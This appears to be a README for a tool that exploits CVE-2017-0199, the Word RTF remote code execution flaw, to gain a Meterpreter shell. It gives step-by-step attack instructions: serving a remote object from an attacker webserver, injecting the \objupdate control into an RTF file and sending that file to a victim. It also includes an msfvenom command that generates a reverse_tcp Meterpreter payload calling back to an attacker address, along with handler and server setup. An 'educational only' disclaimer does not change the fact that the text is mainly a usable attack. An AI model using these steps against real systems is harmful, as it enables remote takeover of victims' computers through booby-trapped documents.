This is an article with video tutorial and tool to gain a meterpreter shell by exploiting CVE-2017-0199 (Word RTF RCE) vulnerability.
- Start a webserver on attacker machine (Kali Linux)
- Upload innocent.doc in public folder
- On windows machine, open MS Office word and insert an innocent remote doc file (innocent.doc) from attacker machine as an object
- Save the file as RTF
- Modify RTF to inject \objupdate control
- Stop the webserver on attacker machine
- Share this RTF file with victim
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > shell.exe
- Start multi handler
Step-3) Start attacker script (server.py) on the attacker machine where the innocent.doc was uploaded (Kali Linux)
- Specify URL of meterpreter shell
- Specify location of shell
This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.
Obviously, I am not a fulltime developer so expect some hiccups
Please report bugs, issues to [email protected]